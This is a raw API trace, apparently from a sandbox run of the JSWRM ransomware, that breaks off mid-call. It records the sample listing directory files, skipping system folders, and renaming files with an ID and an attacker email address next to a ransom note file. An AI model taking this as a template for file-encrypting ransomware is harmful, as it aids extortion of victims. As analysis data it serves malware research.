RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0068.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0068.055] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\jswrm-decrypt.hta")) returned 0x20 [0068.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0068.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0068.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0068.055] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa063932e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f3a5d22, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231e00 [0068.056] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.056] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa063932e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f3a5d22, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.056] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.056] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.056] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x180, dwReserved0=0x0, dwReserved1=0x0, cFileName="ea.xml", cAlternateFileName="")) returned 1 [0068.056] lstrcmpiW (lpString1="ea.xml", lpString2=".") returned 1 [0068.056] lstrcmpiW (lpString1="ea.xml", lpString2="..") returned 1 [0068.056] lstrcmpiW (lpString1="ea.xml", lpString2="...") returned 1 [0068.056] lstrcmpiW (lpString1="ea.xml", lpString2="windows") returned -1 [0068.057] lstrcmpiW (lpString1="ea.xml", lpString2="recovery") returned -1 [0068.057] lstrcmpiW (lpString1="ea.xml", lpString2="perflogs") returned -1 [0068.057] lstrcmpiW (lpString1="ea.xml", lpString2="documents and settings") returned 1 [0068.057] lstrcmpiW (lpString1="ea.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.057] lstrcmpiW (lpString1="ea.xml", lpString2="system volume information") returned -1 [0068.057] lstrcmpiW (lpString1="ea.xml", lpString2="msocache") returned -1 [0068.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ea.xml", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0068.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ea.xml", cchWideChar=6, lpMultiByteStr=0x345e870, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ea.xml", lpUsedDefaultChar=0x0) returned 6 [0068.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ea.xml", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0068.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ea.xml", cchWideChar=6, lpMultiByteStr=0x345e840, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ea.xml", lpUsedDefaultChar=0x0) returned 6 [0068.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0068.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0068.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0068.057] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.060] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=10082418549837304) returned 0 [0068.060] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.060] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.060] CloseHandle (hObject=0xffffffff) returned 1 [0068.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0068.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0068.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0068.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0068.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0068.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0068.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.061] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0068.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0068.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0068.061] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f3a5d22, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f3a5d22, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f3a5d22, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.061] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0068.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0068.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.061] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x387, dwReserved0=0x0, dwReserved1=0x0, cFileName="keypadbase.xml", cAlternateFileName="")) returned 1 [0068.061] lstrcmpiW (lpString1="keypadbase.xml", lpString2=".") returned 1 [0068.062] lstrcmpiW (lpString1="keypadbase.xml", lpString2="..") returned 1 [0068.062] lstrcmpiW (lpString1="keypadbase.xml", lpString2="...") returned 1 [0068.062] lstrcmpiW (lpString1="keypadbase.xml", lpString2="windows") returned -1 [0068.062] lstrcmpiW (lpString1="keypadbase.xml", lpString2="recovery") returned -1 [0068.062] lstrcmpiW (lpString1="keypadbase.xml", lpString2="perflogs") returned -1 [0068.062] lstrcmpiW (lpString1="keypadbase.xml", lpString2="documents and settings") returned 1 [0068.062] lstrcmpiW (lpString1="keypadbase.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.062] lstrcmpiW (lpString1="keypadbase.xml", lpString2="system volume information") returned -1 [0068.062] lstrcmpiW (lpString1="keypadbase.xml", lpString2="msocache") returned -1 [0068.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0068.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="keypadbase.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0068.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="keypadbase.xml", cchWideChar=14, lpMultiByteStr=0x345e870, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="keypadbase.xml", lpUsedDefaultChar=0x0) returned 14 [0068.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0068.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0068.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="keypadbase.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0068.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="keypadbase.xml", cchWideChar=14, lpMultiByteStr=0x345e840, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="keypadbase.xml", lpUsedDefaultChar=0x0) returned 14 [0068.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0068.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0068.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0068.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0068.062] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.062] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9969134492411904) returned 0 [0068.062] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.062] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.062] CloseHandle (hObject=0xffffffff) returned 1 [0068.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0068.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0068.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0068.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0068.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0068.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0068.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.063] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0068.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0068.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0068.063] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor-kor.xml", cAlternateFileName="")) returned 1 [0068.063] lstrcmpiW (lpString1="kor-kor.xml", lpString2=".") returned 1 [0068.063] lstrcmpiW (lpString1="kor-kor.xml", lpString2="..") returned 1 [0068.063] lstrcmpiW (lpString1="kor-kor.xml", lpString2="...") returned 1 [0068.063] lstrcmpiW (lpString1="kor-kor.xml", lpString2="windows") returned -1 [0068.063] lstrcmpiW (lpString1="kor-kor.xml", lpString2="recovery") returned -1 [0068.063] lstrcmpiW (lpString1="kor-kor.xml", lpString2="perflogs") returned -1 [0068.063] lstrcmpiW (lpString1="kor-kor.xml", lpString2="documents and settings") returned 1 [0068.063] lstrcmpiW (lpString1="kor-kor.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.063] lstrcmpiW (lpString1="kor-kor.xml", lpString2="system volume information") returned -1 [0068.063] lstrcmpiW (lpString1="kor-kor.xml", lpString2="msocache") returned -1 [0068.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0068.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kor-kor.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kor-kor.xml", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kor-kor.xml", lpUsedDefaultChar=0x0) returned 11 [0068.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0068.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0068.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kor-kor.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kor-kor.xml", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kor-kor.xml", lpUsedDefaultChar=0x0) returned 11 [0068.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0068.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0068.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0068.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0068.064] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.069] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9965183122499952) returned 0 [0068.070] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.070] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.070] CloseHandle (hObject=0xffffffff) returned 1 [0068.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0068.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, 